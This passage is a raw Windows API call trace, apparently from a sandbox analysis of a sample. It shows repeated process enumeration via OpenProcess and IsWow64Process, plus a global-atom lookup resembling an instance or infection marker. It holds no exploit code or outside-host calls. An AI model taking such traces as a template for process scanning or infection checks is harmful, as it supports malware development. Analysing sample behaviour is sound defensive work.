	[0140.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.737] CloseHandle (hObject=0x2dc) returned 1
	[0140.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.737] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.737] CloseHandle (hObject=0x2dc) returned 1
	[0140.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.738] CloseHandle (hObject=0x2dc) returned 1
	[0140.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0140.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.738] CloseHandle (hObject=0x2dc) returned 1
	[0140.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.738] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.738] CloseHandle (hObject=0x2dc) returned 1
	[0140.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.739] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.739] CloseHandle (hObject=0x2dc) returned 1
	[0140.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.739] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.739] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.739] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.740] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.740] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.740] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.740] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.740] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.741] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.741] CloseHandle (hObject=0x2dc) returned 1
	[0140.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.741] CloseHandle (hObject=0x2dc) returned 1
	[0140.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.741] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.741] CloseHandle (hObject=0x2dc) returned 1
	[0140.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.742] CloseHandle (hObject=0x2dc) returned 1
	[0140.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.742] CloseHandle (hObject=0x2dc) returned 1
	[0140.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.742] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.742] CloseHandle (hObject=0x2dc) returned 1
	[0140.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.779] CloseHandle (hObject=0x2dc) returned 1
	[0140.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.779] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.779] CloseHandle (hObject=0x2dc) returned 1
	[0140.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.780] CloseHandle (hObject=0x2dc) returned 1
	[0140.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.780] CloseHandle (hObject=0x2dc) returned 1
	[0140.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.780] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.780] CloseHandle (hObject=0x2dc) returned 1
	[0140.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.781] CloseHandle (hObject=0x2dc) returned 1
	[0140.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.781] CloseHandle (hObject=0x2dc) returned 1
	[0140.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.781] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.781] CloseHandle (hObject=0x2dc) returned 1
	[0140.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.782] CloseHandle (hObject=0x2dc) returned 1
	[0140.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.782] CloseHandle (hObject=0x2dc) returned 1
	[0140.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.782] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.782] CloseHandle (hObject=0x2dc) returned 1
	[0140.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.783] CloseHandle (hObject=0x2dc) returned 1
	[0140.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.783] CloseHandle (hObject=0x2dc) returned 1
	[0140.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.783] CloseHandle (hObject=0x2dc) returned 1
	[0140.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.783] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.783] CloseHandle (hObject=0x2dc) returned 1
	[0140.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.784] CloseHandle (hObject=0x2dc) returned 1
	[0140.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.784] CloseHandle (hObject=0x2dc) returned 1
	[0140.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.784] CloseHandle (hObject=0x2dc) returned 1
	[0140.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0140.784] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.784] CloseHandle (hObject=0x2dc) returned 1
	[0140.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.785] CloseHandle (hObject=0x2dc) returned 1
	[0140.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.785] CloseHandle (hObject=0x2dc) returned 1
	[0140.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0140.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.785] CloseHandle (hObject=0x2dc) returned 1
	[0140.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.785] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.785] CloseHandle (hObject=0x2dc) returned 1
	[0140.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.786] CloseHandle (hObject=0x2dc) returned 1
	[0140.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0140.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.786] CloseHandle (hObject=0x2dc) returned 1
	[0140.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.786] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.786] CloseHandle (hObject=0x2dc) returned 1
	[0140.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.787] CloseHandle (hObject=0x2dc) returned 1
	[0140.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0140.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.787] CloseHandle (hObject=0x2dc) returned 1
	[0140.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.787] CloseHandle (hObject=0x2dc) returned 1
	[0140.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.787] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.787] CloseHandle (hObject=0x2dc) returned 1
	[0140.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.788] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.788] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.788] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.789] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.789] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.789] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.789] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.789] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.789] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.790] CloseHandle (hObject=0x2dc) returned 1
	[0140.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.790] CloseHandle (hObject=0x2dc) returned 1
	[0140.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.790] CloseHandle (hObject=0x2dc) returned 1
	[0140.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.790] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.790] CloseHandle (hObject=0x2dc) returned 1
	[0140.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.791] CloseHandle (hObject=0x2dc) returned 1
	[0140.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.791] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.791] CloseHandle (hObject=0x2dc) returned 1
	[0140.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.828] CloseHandle (hObject=0x2dc) returned 1
	[0140.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.828] CloseHandle (hObject=0x2dc) returned 1
	[0140.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.829] CloseHandle (hObject=0x2dc) returned 1
	[0140.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.829] CloseHandle (hObject=0x2dc) returned 1
	[0140.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.830] CloseHandle (hObject=0x2dc) returned 1
	[0140.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.830] CloseHandle (hObject=0x2dc) returned 1
	[0140.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.830] CloseHandle (hObject=0x2dc) returned 1
	[0140.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.830] CloseHandle (hObject=0x2dc) returned 1
	[0140.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.831] CloseHandle (hObject=0x2dc) returned 1
	[0140.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.831] CloseHandle (hObject=0x2dc) returned 1
	[0140.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.831] CloseHandle (hObject=0x2dc) returned 1
	[0140.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.831] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.832] CloseHandle (hObject=0x2dc) returned 1
	[0140.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.832] CloseHandle (hObject=0x2dc) returned 1
	[0140.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.832] CloseHandle (hObject=0x2dc) returned 1
	[0140.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.832] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.832] CloseHandle (hObject=0x2dc) returned 1
	[0140.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.833] CloseHandle (hObject=0x2dc) returned 1
	[0140.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.833] CloseHandle (hObject=0x2dc) returned 1
	[0140.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.833] CloseHandle (hObject=0x2dc) returned 1
	[0140.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0140.833] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.833] CloseHandle (hObject=0x2dc) returned 1
	[0140.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.834] CloseHandle (hObject=0x2dc) returned 1
	[0140.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.834] CloseHandle (hObject=0x2dc) returned 1
	[0140.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0140.834] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.834] CloseHandle (hObject=0x2dc) returned 1
	[0140.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.835] CloseHandle (hObject=0x2dc) returned 1
	[0140.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.835] CloseHandle (hObject=0x2dc) returned 1
	[0140.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0140.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.835] CloseHandle (hObject=0x2dc) returned 1
	[0140.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.836] CloseHandle (hObject=0x2dc) returned 1
	[0140.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.836] CloseHandle (hObject=0x2dc) returned 1
	[0140.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
